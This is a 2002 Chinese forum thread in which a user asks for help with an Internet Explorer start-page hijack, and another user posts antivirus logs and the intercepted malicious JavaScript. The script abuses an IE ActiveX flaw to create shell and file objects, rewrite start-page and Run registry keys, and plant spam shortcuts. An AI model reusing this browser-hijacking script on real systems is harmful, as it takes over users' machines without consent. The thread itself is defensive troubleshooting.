taw1983

我机子的默认主页被人改掉，我修改（包括在注册表）回来后还是一打开
ie浏览器就会出现那就个网页，而且金山毒百可以找到病毒并删除，但不顶用
怎么办
非法网页地址
http://888y.com/a003/033-3.htm还有http://www.51cq.net
小弟现在不知道，怎么办，
大家帮帮忙，谢谢！
金山毒霸显示的为JS.carbox，目录为
C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\KLMRS5Y3\0331[1].HTM
我把这个文件夹（C:\WINDOWS\TEMPORARY INTERNET FILES）中所有的都删除掉，可是
开机后又出来了
我用ie中的安全，受限站点，但还是会出来，你们说，我该怎么办呢？
谢谢！

[此贴子已经被作者于2002-8-19 9:33:31编辑过]

[此贴子已经被作者于2002-8-19 13:32:57编辑过]

ps_jacky

我去了你所说的非法网站。
第一个什么网站没什么特别的；第二个网站会问“是否设置为主页”，我点的否，所以一切正常，不知道你是怎么搞的。
我开了  天网+瑞星防火墙+瑞星实时监控    没有异常

ps_jacky

不好意思，呵呵~~~，刚才没有仔细去看网站，所以没有什么发现。经过我的测试，发现以下的一些东西，希望对你有帮助。在我的机子上，所有的东西都被拦截，没有受到破坏，天网没有任何反应，可能是因为它的防御侧重点不在这方面吧！但天网还是很不错的哦：）

PS：你是怎么找到这些网站的咯？个人觉得没什么意思，也许是以前看的太多啦吧，呵呵~~以下是实时监控的记录
FoundVirusTime:2002-08-19- 23:44
FileNameJ18DJ18.L4.BIZCN[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\FJCBTA8L
VirusName:script.exploit.spage.yuzia
Result:杀毒成功
FoundVirusTime:2002-08-19- 23:45
FileName:3[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\OPQ5CP07
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除
FoundVirusTime:2002-08-19- 23:45
FileName:3R[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\B0JR3B80
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除
FoundVirusTime:2002-08-19- 23:45
FileName:L[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\SL2FKPI7
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除
FoundVirusTime:2002-08-19- 23:45
FileName:LR[1].HTM
FilePath:C:\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\QZRXQIVD
VirusName:Script.ActiveXComp.Expl.hf
Result:文件被删除

以下是瑞星防火墙的记录
Anti 'GoFriller' Trojan  202.99.67.11:1051->211.91.231.212:1394 TCP SYN+ACK 该数据包被成功拦截                    
Anti 'GoFriller' Trojan  202.99.67.11:1051->211.91.231.212:1394 TCP ACK     该数据包被成功拦截                    
Anti 'GoFriller' Trojan  202.99.67.11:1051->211.91.231.212:1394 TCP SYN+ACK 该数据包被成功拦截                    
Anti 'GoFriller' Trojan  202.99.67.11:1051->211.91.231.212:1394 TCP SYN+ACK 该数据包被成功拦截                    

这是被拦截下来的代码

当前正在执行的程序的名称和打开的文件的名称是：
"C:\Program Files\Internet Explorer\IEXPLORE.EXE"

*********************************************************************************************
可疑代码的动作如下：
有写注册表的动作
有利用IE漏洞的动作
有创建文件对象的动作
有创建 SHELL 对象的动作

*********************************************************************************************
可疑代码显示如下：
document.write(""

function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL";
Shor.TargetPath = SiteURL;
Shor.Save();
}

function f(){
try
{
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();

try{
//if (document.cookie.indexOf("ChgLive") == -1)
//{

var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://www.qqsh.net/2");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8DE0FCD4-5EB5-11D3-AD25-00002100131c}\\Icon","");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8DE0FCD4-5EB5-11D3-AD25-00002100131c}\\ButtonText","Yahoo");
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecChangeSettings", "1");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer-30000歌曲在线听www.mtv99.com");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Microsoft Internet Explorer-30000歌曲在线听www.mtv99.com");

Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dbr", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\arke", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page", "http://www.51cq.net");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.51cq.net");
//添加到IE右键菜单
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\MenuExt\\如何得到女孩QQ号码 :::>www.51cq.net\\", "c:\\WINDOWS\\TEMP\\syshlp.htm");

//添加到IE工具栏
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\ButtonText", "找喜欢做爱的女孩");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\CLSID", "{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\Default Visible", "Yes");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\Exec", "http://www.51cq.net");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\HotIcon", ",4");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\Icon", ",4");
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Extensions\\{8FBA04EE-3024-11D2-8F1F-0000F87ABD16}\\MenuText", "复原&IE选项(&I)");
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="ChgLive=general; expires=" + expdate.toGMTString() + "; path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc)) {
    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
    if(!FSO.FolderExists(loc)) {
        return;
       }
   }
AddFavLnk("c:\\windows\\Desktop", "网吧找女孩QQ","http://www.51cq.net");AddFavLnk("c:\\windows\\Desktop", "音乐在线3000首","http://www.51cq.com");
AddFavLnk("c:\\windows\\Start Menu", "找喜欢作爱的女孩", "http://www.51cq.net");AddFavLnk("c:\\windows\\Start Menu", "网吧得到女孩QQ号", "http://www.51cq.net");
AddFavLnk(loc, "哪种女孩最风骚", "http://www.51cq.net");
AddFavLnk(loc, "哪种女孩最风骚", "http://www.51cq.net");
AddFavLnk("C:\\WINDOWS\\Application Data\\Microsoft\\Internet Explorer\\Quick Launch", "30000歌曲在线听", "http://www.51cq.net");
//}
}

catch(e){ }
}
catch(e){ }
}

function init(){
setTimeout("f()", 1000);
}
init();

king

可以在注册表中搜索你被改后的默认主页的关键字。可以早到他的位子。。看看就知道是怎么回事。。改改就可以了“）
不过最好是对那东西有些了解的

taw1983

谢谢你们的回复，我昨天刚到学校，开机后就那样，然后我按经验，修改注册表，可是每当我重新开机，它又给我全改回来了，我把ie 缓冲文件全部删除也不行。
现在我使用了那个超级兔子暂时没什么大事。
我想知道那个恶意代码是怎么找出来的？

ps_jacky

恶意代码是我的瑞星实时监控拦截下来的。

看来瑞星还是很不错的啊，呵呵~~~，我用的唯一的Z版产品！

taw1983

我用的是金山毒霸，也是唯一的正版产品（指掏钱的）
还有很多直接在网站中下载，
我现在用那个超级兔子，目前再无该情况发生！
超级兔子很不错啊，